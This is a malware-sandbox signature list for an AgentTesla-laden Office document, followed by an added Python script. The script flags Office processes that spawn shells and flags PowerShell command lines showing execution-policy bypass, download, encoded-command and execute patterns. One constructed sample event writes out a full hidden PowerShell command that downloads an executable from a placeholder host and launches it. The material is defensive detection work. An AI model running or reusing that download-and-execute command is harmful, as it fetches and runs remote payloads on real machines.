Found malware configuration
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected AgentTesla
Sigma detected: Powershell download and execute file
Document exploit detected (creates forbidden files)
Microsoft Office creates scripting files
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Yara detected Costura Assembly Loader
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Injects a PE file into a foreign process
Powershell drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long command-line option found; this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Sigma detected: Verclsid.exe Runs COM Object
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document is missing an OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within a range reserved for system DLLs (kernel32.dll, advapi32.dll, etc.)
Creates a process in suspended mode (likely to inject code)
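The PowerShell and Office-spawning signatures in this list (Office product spawning a Windows shell, execution-policy bypass, DownloadFile / web request in the command line, encoded or very long command lines) correspond to checks that can be run against ordinary process-creation telemetry. The following Python is an added example for this page, not part of the sandbox report or any vendor's rule set: the event field names, process names and command lines are constructed, and the 1000-character "very long command line" threshold is an assumption, not the sandbox's own value.

```python
import re
from pathlib import PureWindowsPath

# Parent/child pairs behind "Microsoft Office Product Spawning Windows Shell".
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "eqnedt32.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Command-line patterns behind the policy-bypass / download / execute signatures.
PATTERNS = {
    "execution_policy_bypass": re.compile(
        r"-(?:ex|ep|executionpolicy)\s+(?:bypass|unrestricted)", re.I),
    "web_download": re.compile(
        r"downloadfile|downloadstring|downloaddata|net\.webclient|"
        r"invoke-webrequest|\biwr\b|start-bitstransfer|\bcurl\b|\bwget\b", re.I),
    "execute_payload": re.compile(
        r"start-process|invoke-expression|\biex\b|invoke-item|\bsaps\b", re.I),
    "encoded_command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
LONG_CMDLINE = 1000  # characters; assumed threshold for "very long cmdline"


def triage(event):
    """Return the sorted list of heuristic labels one process event triggers.

    event: dict with parent_image, image and command_line (constructed schema).
    """
    hits = []
    # PureWindowsPath splits on backslashes regardless of the host OS.
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    child = PureWindowsPath(event["image"]).name.lower()
    cmd = event["command_line"]

    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        hits.append("office_spawns_shell")
    for label, pattern in PATTERNS.items():
        if pattern.search(cmd):
            hits.append(label)
    if len(cmd) > LONG_CMDLINE:
        hits.append("very_long_cmdline")
    # Download plus execute in one command line is the chain the report flags.
    if "web_download" in hits and "execute_payload" in hits:
        hits.append("download_and_execute")
    return sorted(hits)


# Constructed sample events: one Office-to-PowerShell dropper chain, one
# encoded command from Explorer, and one benign scheduled script.
SAMPLE_EVENTS = {
    "office_to_powershell": {
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'''powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -Command "(New-Object Net.WebClient).DownloadFile('http://example.invalid/up.exe','C:\Users\Public\up.exe'); Start-Process 'C:\Users\Public\up.exe'"''',
    },
    "encoded_from_explorer": {
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoProfile -EncodedCommand " + "A" * 1200,
    },
    "benign_script": {
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
}


def run_samples():
    """Triage every constructed sample and return {name: labels}."""
    return {name: triage(event) for name, event in SAMPLE_EVENTS.items()}


if __name__ == "__main__":
    for name, labels in run_samples().items():
        print(f"{name}: {', '.join(labels) or 'no hits'}")
```

The labels are deliberately independent so a single event can be scored by how many of them fire; the Office-parent check matters most, since a PowerShell download from WINWORD.EXE has almost no benign explanation, whereas an encoded command from Explorer is common in administration tooling and should be weighted by context.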